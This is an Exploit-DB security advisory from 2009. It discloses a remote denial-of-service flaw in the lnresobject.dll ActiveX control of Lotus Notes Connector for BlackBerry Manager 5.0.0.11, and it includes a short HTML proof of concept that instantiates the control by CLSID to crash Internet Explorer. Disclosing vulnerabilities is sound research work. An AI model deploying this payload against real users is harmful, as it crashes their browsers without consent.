Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service

EDB-ID:

9517


Platform:

Windows

Published:

2009-08-25

#####################################################################################

Application:  Lotus note connector for Blackberry Manager 5.0.0.11 (And maybe other application that use it..)
            
Platforms:    Windows XP Professional French SP2 and SP3

crash:	      IE 8.0.6001.18702
	      IE 6.0.2900.2180
	
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

Notes Connector is an easy to use tool that allows you to instantly synchronize all your Lotus Notes email. 

#####################################################################################

============================
2) Technical details 
============================

Name:	lnresobject.dll
Ver.:	7.1.1.119
CLSID:	{158CD9E8-E195-4E82-9A78-0CF6B86B3629}



#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


<html><body>
<object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object>
</body></html>

#####################################################################################

# milw0rm.com [2009-08-25]